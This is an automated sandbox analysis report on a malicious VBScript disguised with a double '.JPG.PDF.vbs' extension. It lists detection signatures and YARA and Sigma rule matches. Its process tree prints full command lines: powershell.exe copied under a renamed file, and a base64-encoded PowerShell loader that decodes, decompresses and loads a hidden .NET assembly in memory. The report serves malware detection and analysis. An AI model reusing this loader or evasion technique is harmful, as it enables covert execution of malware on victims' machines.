Windows Analysis Report
QT202515010642.JPG.PDF.vbs
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Creates processes via WMI
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Cscript/Wscript Uncommon Script Extension Execution
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Double Extension Files
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6416 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\QT202515010642.JPG.PDF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 3052 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\QT202515010642.JPG.PDF.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- QT202515010642.JPG.PDF.vbs.exe (PID: 3136 cmdline: "C:\Users\user\Desktop\QT202515010642.JPG.PDF.vbs.exe" -enc JABPAGMAbABtAGoAagBoAHgAdABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAEUAYQBlAHgAawBnAHEAIAA9ACAAZwBlAHQALQBjAG8AbgB0AGUAbgB0ACAAJABPAGMAbABtAGoAagBoAHgAdABlACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEsAZgBpAGYAZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABFAGEAZQB4AGsAZwBxAC4AUgBlAHAAbABhAGMAZQAoACcAUgBFAE0AIAAnACwAIAAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACAAJwBBACcAKQApADsAJABVAG0AcwB0AHoAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEsAZgBpAGYAZwAgACkAOwAkAFUAdQBkAGsAdABrAGsAZwB4AGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFYAbwB1AHEAeQBhACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFUAbQBzAHQAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAVgBvAHUAcQB5AGEALgBDAG8AcAB5AFQAbwAoACAAJABVAHUAZABrAHQAawBrAGcAeABpACAAKQA7ACQAVgBvAHUAcQB5AGEALgBDAGwAbwBzAGUAKAApADsAJABVAG0AcwB0AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABLAGYAaQBmAGcAIAA9ACAAJABVAHUAZABrAHQAawBrAGcAeABpAC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABLAGYAaQBmAGcAKQA7ACAAJABWAGIAbABqAHoAagBhAG0AYQBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABLAGYAaQBmAGcAKQA7ACAAJABJAGUAagBlAHUAZwB5AG8AYgB2ACAAPQAgACQAVgBiAGwAagB6AGoAYQBtAGEAbwBzAC4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7ACAAWwBTAHkAcwB0AGUAbQAuAEQAZQBsAGUAZwBhAHQAZQBdADoAOgBDAHIAZQBhAHQAZQBEAGUAbABlAGcAYQB0AGUAKABbAEEAYwB0AGkAbwBuAF0ALAAgACQASQBlAGoAZQB1AGcAeQBvAGIAdgAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQASQBlAGoAZQB1AGcAeQBvAGIAdgAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | 

System Summary

Source | Author
---|---
 | Nasreddine Bencherchali (Nextron Systems)
 | Florian Roth (Nextron Systems)